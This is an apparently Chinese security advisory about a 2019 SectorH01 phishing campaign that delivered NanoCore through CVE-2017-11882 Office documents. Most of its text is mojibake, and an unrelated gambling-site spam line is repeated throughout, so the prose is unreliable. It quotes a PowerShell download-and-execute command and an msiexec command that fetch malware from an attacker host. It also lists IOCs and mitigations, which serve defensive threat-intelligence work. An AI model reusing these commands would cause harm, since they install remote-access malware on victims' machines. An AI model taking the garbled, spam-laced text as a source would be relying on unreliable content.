SectorH01¹¥»÷×éÖ¯´¹µöÓʼþÊÂÎñ°²È«¹«¸æ

°ä²¼¹¦·ò 2019-09-22

ÊÂÎñ²¼¾°



½üÆÚ¼ì²âµ½SectorH01¹¥»÷×éÖ¯¡°ÉÌóÐÅ¡±´¹µöÓʼþ¹¥»÷ÔÚ9Ô³öÏÖÐÂÒ»ÂÖÔö³¤ ¡£ÔÚÕâ´Î¹¥»÷ÖÐ £¬ºÚ¿Í¾«ÐÄ»ú¹ØµÄ´øÓÐoffice¹«Ê½±à×ëÆ÷·ì϶CVE-2017-11882»òºê´úÂëµÄ¶ñÒâÎĵµ £¬½«Æä×÷Ϊ¸½¼þÅúÁ¿·¢ËÍÖÁ±íóÐÐÒµÆóÒµÓÊÏäÖÐ £¬ÔÚÆä´ò¿ªÎĵµÖÐÕкóÖ²ÈëÔ¶¿ØÄ¾ÂíNanoCore½øÐлúÃÜÐÅÏ¢ÇÔÈ¡ºÍÔ¶³Ì½ÚÔì £¬±¾´Î¹¥»÷¶¥·åʱÆÚÿÌì³É¹¦Í¶µÝ³¬3000¸öÓʼþµØÖ· ¡£



ÊÂÎñÃèÊö



ͨ¹ýËÝÔ´·ÖÎö £¬ÎÒÃÇ·¢ÏÖºÚ¿ÍÒÉËÆÊ¹ÓÃÒ»¿îÃûΪ¡°****ÓʼþȺ·¢Æ÷¡±µÄÈí¼þ½øÐÐÓÊÏ䵨ַ²É¼¯ºÍÓʼþÅúÁ¿Í¶µÝ ¡£¾Ý²âËã £¬¸ÃÈí¼þÓµÓÐ5000¸ö/Ó×ʱµÄÓÊÏ䵨ַ²É¼¯ÄÜÁ¦ £¬²¢ÇÒÔÚ·¢¼þʱÄܹ»×Ô¶¯¸ü»»´úÀíIP £¬Òѱ»ºÚ¿ÍÀûÓÃÓÚÕë¶Ô¶Ô±íóÆóÒµµÄ¡°×Ô¶¯»¯¡±¹¥»÷ ¡£²¿ÃÅÊܹ¥»÷ÆóÒµÈçÏ£º


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


ƾ¾Ýͳ¼ÆÊý¾Ý £¬Óг¬¹ý1000¼ÒÆóÒµÊܵ½Õâ´Î¹¥»÷Ó°Ïì £¬ÆäÖнüÒ»°ëÒÔÉÏÉ¢²¼Ôڹ㶫¡¢½­ËÕ¡¢Õã½­ºÍÉϺ£ËĵØ £¬ÆäÖй㶫ռ±È³¬¹ý30% ¡£³ö¸ñÊǹ㶫Àö½­ºÍººÖÐÓÉÓÚÔì×÷ÒµºÍ±íóÐÐÒµÃܼ¯ £¬³ÉΪ±¾´Î¹¥»÷Êܺ¦×îÑϳÁµÄÇøÓò ¡£


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾

 
´ÓÐÐҵɢ²¼À´¿´ £¬¡°ÉÌóÐÅ¡±¹¥»÷Ö¸±êÖØÒª¼¯ÖÐÔÚ¹¤ÒµÔì×÷¼°ÒµÎñÐÐÒµ ¡£Í³¼ÆÊý¾ÝÏÔʾ £¬±»¹¥»÷µÄ88%ΪÔì×÷Òµ £¬Ôü×Ò12%ÊÇÓëÔì×÷ÒµÌṩÓйØÁªµÄÏúÊÛ¡¢ÔËÊä¡¢ÉÌÎñ·þÎñÐÐÒµ ¡£


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾



ÊÂÎñ·ÖÎö



´¹µöÓʼþÖØÒªÍ¨¹ýαÔìÒÔÏ·¢¼þÓÊÏä½øÐз¢ËÍ £¬ÆäÖÐʹÓÃ×î¶àµÄΪ


kieth@sdgtrading.co.uk
kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in


ÒÔÆäÖÐÒ»·âÓʼþΪÀý £¬´ÓÓʼþÍ·²¿ÐÅÏ¢ÖÐÄܹ»¿´µ½·¢¼þ±¨´ð¡°Keith Ward/SDG /UK¡± £¬·¢¼þÓÊÏäµØÖ·Îªkieth@sdgtrading.co.uk ¡£sdgtradingÊÇÒ»¼Ò×ܲ¿Î»ÓÚÓ¢¹úµÄ½ø³ö¿ÚÒµÎñ¹«Ë¾ £¬Ä¿Ç°´ò¿ª¸Ã¹«Ë¾¹Ù·½ÍøÕ¾Äܹ»Õý³£½Ó¼û ¡£


´ò¿ªÍøÕ¾µÄcontact-usÒ³ÃæÎÒÃÇ·¢ÏÖÓÐÒ»¸öÖ°ÎñΪUK & European Sales(Ó¢¹ú¼°Å·ÖÞµØÓòÏúÊÛ)µÄÈËÔ±ÁªÏµ·½Ê½Îªkeith@sdgtrading.co.uk £¬¶øÕâÕýÊÇ´¹µöÓʼþ·¢¼þÓÊÏä(ÓÐÁ½¸ö×ÖĸµØÎ»»¥»») ¡£ÎÒÃÇ´§Ä¦¹¥»÷Õß¿ÉÄÜͨ¹ýÅÀÈ¡»òÕßÈËÎªÍøÂçµÄ·½Ê½»ñÈ¡Á˸ÃÒµÎñ¹«Ë¾µÄÓʼþµØÖ· £¬¶øºó¼Ù×°³É¸Ã¹«Ë¾µÄÏúÊÛÈËÔ±·¢ËÍ´¹µöÓʼþ½øÐй¥»÷ ¡£


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


´¹µöÓʼþ·¢¼þÈËÐÅÏ¢


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


ÒµÎñ¹«Ë¾ÏúÊÛÈËÔ±ÐÅÏ¢



´¹µöÓʼþ


ÓʼþÄÚÈÝÊǹØÓÚÒµÎñ¶©µ¥È·ÈϺͼÛÖµÕ÷ѯ ¡£Óʼþ±íÊöÖÐ¸ßÆµ³öÏÖ³öÏÖÒÔÏ´ʾ䣺
¡°¶©¹º¡±¡¢¡°¼ÛÖµ¡±¡¢¡°¼ÛÄ¿±í¡±¡¢¡°ÏúÊÛǰÌᡱ¡¢¡°ÕÛ¿Û¡±¡¢¡°×°ÔËÈÕÆÚ¡±¡¢¡°²É¹º¹æ¸ñ¡±µÈ ¡£


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


ÓʼþÖл¹Ö¸³öÓʼþ¸½¼þÖÐÔ̺¬¡°ÏëÒª²É¹ºµÄ²úÆ·Ìõ¿î¡±Îĵµ £¬ÇëÔĶÁºó½øÐлظ´ £¬²¿ÃÅÎĵµÃûÈçÏ£º


RFQ0591403-SDG.doc

RFQ015770082.doc


·ÖÎö·¢ÏÖ £¬¸½¼þÎĵµÖÐÔ̺¬Office¹«Ê½±à×ëÆ÷·ì϶CVE-2017-11882ÀûÓôúÂë»ò¶ñÒâºê´úÂë £¬¾­¹ý·ì϶¹¥»÷»òºê´úÂëÖ´Ðйý³Ì £¬»á´¥·¢ÓÃÓÚÏÂÔØÄ¾ÂíµÄPowershellºÅÁîÖ´ÐÐ £¬½øÒ»²½ÏÂÔØÄ¾Âí£º


'cmd.exe /c PowerShell "try{$tA=$env:temp+\'\\fo.exe\';Import-Module BitsTransfer;Start-BitsTransfer -Source \'hxxps://oppofile.duckdns.org/a/gmb.exe\' -Destination $tA;(New-Object -com Shell.Application).ShellExecute( $tA);}catch{}"'


³ýÁËÀûÓÃPowershell £¬»¹Óв¿ÃŹ¥»÷ÖÐʹÓÃWindows×°Ö÷¨Ê½(msiexec.exe)×°ÖÃMSI°üÎļþ½øÐÐľÂíÏÂÔØ£º


msiEXEc  /i http[:]//oppofile.duckdns.org/d/dar.msi


´ÓĿǰ²¶»ñµ½µÄ¹¥»÷ÎĵµÖÐÎÒÃÇ·¢ÏÖÓÐÒÔÏÂľÂíÏÂÔØµØÖ·£º


hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi

hxxp://oppofile.duckdns.org/e/gmb.msi


Ô¶¿ØÄ¾Âí


±»ÏÂÔØÖ²ÈëµÄÏÖʵÉÏÊǵľ­¹ý»ìºÏµÄÔ¶¿ØÄ¾ÂíNanoCore £¬NanoCoreÊÇʹÓÃ.Net˵»°±àдµÄÖ°ÄÜ׳´óµÄÔ¶³Ì½Ó¼û½ÚÔìľÂí£¨RAT£© £¬Äܹ»ÔÚÖ¸±êÖ÷»úÉϽøÐÐÎļþ²Ù×÷ £¬ÆÁÄ»½ÚÔì £¬ÔËÐÐÖ¸¶¨·¨Ê½ £¬»¹Ö§³Ö²å¼þÀ©´óÖ°ÄÜ £¬±»Ï°È¾NanoCoreľÂíµÄµçÄÔ»á³öÏÖÑϳÁÐÅϢй¶ £¬¹¥»÷Õß»¹Äܹ»ÀûÓÃÖж¾µçÄÔÎªÌø°å £¬¶ÔÖ¸±êÍøÂç³ÖÐø½øÐÐÉøÈëÈëÇÖ ¡£


Ö÷ÌâÄ£¿é±»¼ÓÃܺóÒÔλͼÌåʽ±£ÁôÔÚ×ÊÔ´Îļþ


¡°tewo3zFRzUGateK2dRRrbMo6Wdh7BawEbNw3whpXsTZfWwZYJ5X2aQTf2rHJrHGpTdCgwV16xL12y4YmEZj1nol5xVq6OWJTNPKhhTT3tBIWOAi7IjgznVXv3N2fC3b2wvrYdjp6hvBPP0bLGemkdbuwNcxmAjipQGmsISXkujt¡±ÖÐ


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


´Ó×ÊÔ´ÖлñÈ¡µ½Êý¾Ýºó £¬¾­¹ýÂŴνâÃܵõ½×îÖÕµÄPEÎļþ £¬¶øºó½«ÆäLoadµ½ÄÚ´æ £¬²¢Ìø×ªµ½Èë¿ÚµØÎ»Ö´ÐÐ ¡£


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


×îÖÕÖ´ÐеÄNanoCoreľÂíÖ°ÄÜ׳´ó £¬¿ÉÖ´Ðи÷Àà¶ñÒâ²Ù×÷ £¬ÈçÎļþ²Ù×÷ £¬×¢²á±í±à×ë £¬¹ý³Ì½ÚÔì £¬Îļþ´«Êä £¬Ô¶³ÌºÅÁîÖ´ÐÐ £¬¼üÅ̼ͼµÈ ¡£ÒÔÏÂΪ¸ÃľÂí½ÚÔì¶Ë½çÃæ£º


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


Ⱥ·¢Èí¼þ


ͨ¹ýÅŲé £¬·¢ÏÖÁËÒ»¸öÃûΪ¡°***\ÓʼþȺ·¢Æ÷.exe¡±µÄ¿ÉÒÉ·¨Ê½ £¬Ê¹ÓøÿÉÒÉÎļþÃûÖеġ°***ÓʼþȺ·¢Æ÷¡±¹Ø¼ü×Ö½øÐÐËÑË÷ £¬·¢ÏÖÁËÕâ¿îÃûΪ****µÄÓʼþȺ·¢Æ÷Èí¼þ ¡£¸ÃÈí¼þÓµÓдÓÍøÂçÉÏÅúÁ¿ÅÀÈ¡ÓÊÏ䵨ַ £¬²¢Õë¶Ô»ñµÃµÄÓÊÏä½øÐÐÅúÁ¿·¢ËÍÖ¸¶¨ÓʼþµÄÖ°ÄÜ ¡£


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


ÎÒÃÇÏÂÔØ¸ÃÈí¼þ £¬²¢½øÐÐ×¢²áºÍÊÔÓà ¡£Æ¾¾ÝÆä½çÃæÕ¹Ê¾µÄÖ°ÄÜ £¬Ö»Ðè±àдºÃÓʼþÄÚÈÝ(ËÁÒâÌîд·¢¼þÈËÐÕÃû)¡¢ÅúÁ¿Ôö³¤ÊÕ¼þÈ˵ØÖ·¡¢µã»÷¡°ÆðͷȺ·¢¡±Èý²½ £¬¼´¿É½«Óʼþ¼±¾ç·¢ËÍÖÁ´óÅúµÄÖ¸±êÓÊÏäÖÐ ¡£


¸ÃÈí¼þ»¹Ö§³Ö²é¿´Èº·¢Á˾Ö £¬ÈôÊÇÓз¢ËÍʧ°ÜµÄÇé¿ö £¬Äܹ»Ò»¼ü³Á·¢ ¡£·¢ËÍʱ»¹Äܹ»Ñ¡Ôñ×Ô¶¯¸ü»»´úÀíIP £¬ÕâÔڿ϶¨Ë®Æ½ÉÏÄܹ»°µ²ØÕæÊµ·¢¼þIP ¡£


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


¸ÃÈí¼þ»¹ÓÐÒ»¸ö³ÁÒªµÄÖ°ÄÜÊÇ £¬Ö§³Ö´ÓÖ¸¶¨ÍøÕ¾²É¼¯Ö¸±êÓÊÏä ¡£¸ÃÖ°ÄÜÒ³ÃæÄ¬ÈϵÄÔ´ÍøÕ¾µØÖ·Îªhttp[:]//www.****.biz/ ¡£ÎÒÃdz¢ÊÔʹÓøÃÍøÕ¾½øÐÐÓÊÏä²É¼¯ £¬ÔÚ10·ÖÖÓÖ®ÄÚÄܹ»²É¼¯µ½½ü800¸öÓÊÏ䵨ַ £¬»»ËãºóÒ»¸öÓ×ʱ֮ÄÚÄܹ»²É¼¯µ½5000¸öÓÊÏä £¬¶øÕâЩ±»²É¼¯µ½µÄÓÊÏä¶¼´æÔÚ±»¹¥»÷µÄ¿ÉÄÜ ¡£


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾

 

Äܹ»¿´µ½Õâ¸öĬÈϵÄÓÊÏä²É¼¯ÍøÕ¾¡°**Íø¡±(www.*****.biz)ÊÇÒ»¸öÒµÎñÐÅÏ¢°ä²¼Æ½Ì¨ £¬´óÁ¿³§ÉÌ(»úе¡¢»¯¹¤¡¢µçÆø¡¢ÄÜÔ´¡¢ÒÇÆ÷µÈÐÐÒµ)ÔÚ¸ÃÍøÕ¾Éϰ䲼µÈ¸÷Àà²úÆ·µÄ¹©¸ø»òÇó¹ºÐÅÏ¢ ¡£¶øÃ¿Ò»ÌõÐÅÏ¢³ÇÊи½´ø³§É̵ĵ绰¡¢ÓʱࡢÓÊÏäµÈÁªÏµ·½Ê½ £¬¡°****ÓʼþȺ·¢Æ÷¡¹ØýÊÇ´ÓÕâЩÐÅÏ¢ÖлñÈ¡ÁË´óÁ¿µÄÓÊÏ䵨ַ ¡£


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


¹¥»÷˼·


´ÓÒÔϼ¸¸ö½Ç¶È £¬ÎÒÃÇÒÔΪºÚ¿ÍʹÓÃÁËÓʼþȺ·¢Èí¼þ¡°****ÓʼþȺ·¢Æ÷¡±½øÐи¨Öú¹¥»÷£º


1¡¢Èº·¢Èí¼þ¡°****¡±ÓнüÆÚ½Ó¼û·¢¼þÈËIPµÄ¼Í¼£»
2¡¢Êܺ¦ÆóÒ·àÐÍÓë¡°****ÓʼþȺ·¢Æ÷¡±Ä¬Èϲɼ¯ÓÊÏäÀàÐÍÒ»ÖÂ(¹¤ÒµÆ·ÒµÎñ¹«Ë¾)£»
3¡¢¹¥»÷µÄÓ°ÏìÁìÓòÓë¸ÃÈí¼þµÄ²É¼¯ÄÜÁ¦ÎǺÏ(Êܺ¦ÓÊÏäÔ¼3000¸ö/ÈÕ & Èí¼þµÄ²É¼¯ÄÜÁ¦Ô¼5000¸ö/Ó×ʱ) ¡£
´§Ä¦ºÚ¿ÍÖ´Ðй¥»÷µÄ˼·ÈçÏ£º
1¡¢ºÚ¿ÍÏÂÔØÓʼþȺ·¢Èí¼þ£»
2¡¢»ú¹Ø´øÓÐCVE-2017-11882·ì϶ÀûÓÃ(»òÕߺê´úÂë)µÄoffice¶ñÒâÎļþ£»
3¡¢Ê¹ÓÃ****ÓʼþȺ·¢Æ÷´ÓÒµÎñ·ÖÀàÐÅÏ¢ÍøÕ¾ÅúÁ¿²É¼¯Ö¸±êÓÊÏ䵨ַ£»
4¡¢Ê¹ÓóﱸºÃµÄ¶ñÒâÎĵµ×÷Ϊ¸½¼þ £¬»ú¹Ø´¹µöÓʼþ²¢ÅúÁ¿·¢ËÍ£»
5¡¢ÆÚ´ýÊÕ¼þÈË´ò¿ª¸½¼þ²¢ÖÐÕÐ £¬Í¨¹ýÔ¶¿ØÄ¾ÂíNanoCore¶ÔÖ¸±ê½øÐÐÔ¶³Ì½ÚÔì ¡£


±¦ÔËÀ³¡¤(ÖйúÇø)×îйٷ½ÍøÕ¾


×ܽá


ÔÚÕâ´Î¹¥»÷ÊÂÎñÖÐÄܹ»·¢ÏÖ £¬ºÚ¿ÍÓë»Ò²ú´ÓÒµÈËÔ±³öÏÖÁ˽»¼¯ ¡£»Ò²úÈËÔ±¿ª·¢³öÓʼþȺ·¢¹¤¾ß £¬¹¤¾ß¿ÉÕë¶ÔÍøÕ¾ÉϵĹ«¿ªÓÊÏä½øÐÐÅÀÈ¡ £¬¿ÉÀûÓûñÈ¡µ½µÄÓÊÏä½øÐÐÅúÁ¿Èº·¢Óʼþ ¡£¹¤¾ßÔÚÆä×¢²áµÄ¡°¹ÙÍø¡±ÉϽøÐй«¿ªÊÛÂô £¬Ê¹ÓÃ×¢Ã÷ÖÓ×°ÕýÒ塱µØÌáµ½¡°½öÓÃÓÚÕý¹æÓʼþÓªÏú £¬ÀÄÓÃÕߺó¹ûµÃÒ⡱ ¡£µ«¹¤¾ßÒ»µ©ÊÛ³ö £¬±ãÄÑÒÔ±£Õϱ»ÓÃÓںϷ¨Óô¦ ¡£


¶øºÚ¿Í»ñµÃ´ËÈí¼þºó £¬½«ÆäÄÉÈë¹¥»÷±øÆ÷ÖеÄÒ»Ô± ¡£Ëæºó £¬Ö»Ðè±àдºÃľÂí £¬»ú¹Ø´¹µöÓʼþ £¬¾ÍÄܹ»ÀûÓøù¤¾ß½«´¹µöÓʼþ×Ô¶¯»¯¡¢´óÅúÁ¿µØ·¢ËÍÖÁÆóÒµµÄÓйØÓÊÏäÖÐ ¡£



½¨¸´½¨Òé



1¡¢ÆóÒµÓÊÏäÍø¹Ü½«ÒÔÏ·¢¼þÓÊÏäÉèÖÃΪºÚÃûµ¥


kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in


2¡¢²»Òª´ò¿ª²»Ã÷ÆðÔ´µÄÓʼþ¸½¼þ £¬¶ÔÓÚ¸½¼þÖеÄÎļþÒªÉóÉ÷ÔËÐÐ £¬Èç·¢ÏÖÓо籾»òÆäËû¿ÉÖ´ÐÐÎļþ¿ÉÏÈʹÓÃɱ¶¾Èí¼þ½øÐÐɨÃ裻


3¡¢Éý¼¶officeϵÁÐÈí¼þµ½×îа汾 £¬ÊµÊ±½¨¸´office·¨Ê½·ì϶ £¬²»ÒªÇáÒ×ÔËÐв»³ÉÐÅÎĵµÖеĺꣻ


4¡¢ÍƼö²¿ÊðÖն˰²È«ÖÎÀíϵͳ·ÀÓù²¡¶¾Ä¾Âí¹¥»÷£»


5¡¢Ê¹ÓÃÈëÇÖ¼ì²âϵͳ¼ì²âδ֪ºÚ¿ÍµÄ¸÷Àà¿ÉÒɹ¥»÷ÐÐΪ ¡£



IOC


ÓÊÏä


kieth@sdgtrading.co.uk
export@connect-distribution.co.uk
accounts@snapqatar.com
account@sh-seacare.com
banglore@scsplindia.com

pk3195@dataone.in


Óʼþ¸½¼þ


fec34e9741abedea7f0a4fa991bdc618
11dd68ba724a7e34cdab1aae97a93190
3f36befc186d10551b5a4d65ac35978d
e4b1a5e14064e7c716530528e7615374
3f36befc186d10551b5a4d65ac35978d
1ffd02ef62e8feb788968518fe5fbdb2
a9958884c16f17c2c9e4d75f92117352
d6b697c64723909f0b357e2d49948905

a9958884c16f17c2c9e4d75f92117352


NanaCoreľÂí


2c7885159feae6ebde634418591ad276

453a235ad5ea7055f2af2c51c95a5bb2


ÓòÃû


oppofile.duckdns.org


URL


hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/dar.exe
hxxp://oppofile.duckdns.org/c/alex.exe
hxxp://oppofile.duckdns.org/c/go.exe
hxxps://oppofile.duckdns.org/a/gmb.exe
hxxps://oppofile.duckdns.org/a/alex.exe
hxxp://oppofile.duckdns.org/d/dar.msi
hxxp://oppofile.duckdns.org/e/scan.msi

hxxp://oppofile.duckdns.org/e/gmb.msi



²Î¿¼Á´½Ó



https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/